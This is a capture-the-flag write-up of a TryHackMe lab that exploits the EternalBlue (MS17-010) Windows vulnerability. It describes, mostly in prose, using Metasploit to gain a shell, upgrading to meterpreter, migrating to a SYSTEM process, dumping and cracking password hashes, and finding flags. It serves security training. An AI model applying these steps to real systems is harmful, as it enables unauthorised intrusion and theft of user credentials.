Learn how to exploit operating system-level vulnerabilities and gain root on the target machine in this technical write up of External Blue.
Exploiting System Level Vulnerability
Operating System vulnerabilities are very common especially with Microsoft Windows. These vulnerabilities can be exploited in different ways which can give system-level access to the adversaries trying to break into the system. One such vulnerability is going to be discussed in this article. As a proof of concept, I would be exploiting a very famous vulnerability found in Microsoft Windows which is known as Eternal Blue. The machine I am going to exploit is available on the TryHackMe Platform. So without much further ado lets start!
Exploiting a very popular Microsoft Windows Vulnerability to gain system-level access and escalate privileges.
Exploiting the host machine under consideration will enable the audience to :
- To gain a shell of the compromised system in several ways.
- Migrating the process IDs to get the higher privileged processes.
- Cracking hashes to gain access to different user accounts present on the system of the compromise resulting in gaining access to different flags on the system.
1. Reconnaissance Phase
Let us first gather information about the system of compromise. The most common tool used to gather information regarding the open ports and services is Nmap. So let’s scan our host machine using Nmap with the following flags set.
We get the number of open ports and the services that are running against these ports. This answers our task 2. This information helps in identifying service level vulnerabilities. Notice we also included the script vuln that acts as a vulnerability scanner and tells us about the vulnerabilities it finds. In our case, its MS17–010 also known as Eternal Blue, this vulnerability is marked with the risk level of critical so we are going to exploit this. This gives us the answer to task 3.
2. Gaining Access
Now that we know the vulnerability its time to exploit it. For exploitation, we are going to use Metasploit which contains a large number of exploits and post exploits which can be run against target systems. So fire-up Metasploit by typing msfconsole in the terminal and search for the exploit that corresponds to Eternal blue (MS17–010).
Now that we know which exploit to use, let’s run this exploit. Type show options to know which parameter is required as a prerequisite to run the exploit as seen below. Once the exploit and the parameters are set, run the exploit as shown below.
After running the exploit we see that we have gained the shell of the target machine.
We get all the answers to our Gaining Access Phase.
3. Escalate (POST Exploitation)
Getting a shell is not enough, we have to escalate our privileges to perform administrator-level operations on the system. First, we need to upgrade our shell to meterpreter as it gives a lot of functionalities as compared to normal shell. For this purpose, we need to search for POST exploit in Metasploit.
So after searching we get the POST Module for our shell to be converted into meterpreter. This answers our Task 1 question for this section. We need to set the session on which we want our POST to exploit to work, you can list all the active sessions by typing sessions -l, now select the session by typing SET SESSION #. This answers our Task2 question for this section. You need to set the Local Host too, so type Set LHOST <Ip address>. Once all parameters are set now lets run the post exploit.
Now that we have our meterpreter session we can verify the system info by running the getsystem command.
Run the ps command to check all the processes that are running on the system. Note that down the PID or PPID whose user is NT Authority\SYSTEM. There are a lot of processes running as the NT Authority, so I noted down the spoolsv.exe.
Now let’s migrate to the PPID to take control of the higher privileged process. This answers all the task questions in this section.
Now that we have complete access to the NT Authority system via the migration of higher privileged process. Its time to crack some passwords to login using the credentials of the user. Use hash-dump to dump all the hashes from the SAM database. From this, we get the name of the non-default user (Task1).
Now we need to crack the hash of the non-default user to get the password. For this, I am using the online utility known as the crack-station.
This answers our task 2 question for this section
5. Find Flags
Now that we have done all the tasks for the previous section its time to find the flags. Flags are hidden checkpoints that are spread across the system. Let’s follow the hints and try to find them. Following the hint, I was able to find the first flag.
To find the second flag look for the folder that is utilized to store the passwords of windows. You should find the location by simply googling. Navigate to the folder and there you will find the flag2.
To find out the last flag, you have to be smart. So what I did was search for the file name starting with the flag, from the results that came out I was able to navigate to that particular folder and get my last flag. If you are unable to access the directory as shown below use \\ before the directory and file name and this will solve the non-access issue.
The eternal blue vulnerability was very famous and many systems were compromised using this vulnerability. Microsoft released fixes to patch up these vulnerabilities for different Operating systems. With this, we conclude that using such vulnerabilities systems can be compromised and the adversary could use it in any way he pleases. So it is recommended to always keep your software and windows updated with the latest version, fixes, and patches to reduce the risk of being compromised by such vulnerabilities.
I am a cybersecurity enthusiast pursuing my Master’s in Information Security and trying to get into a full-time cybersecurity career.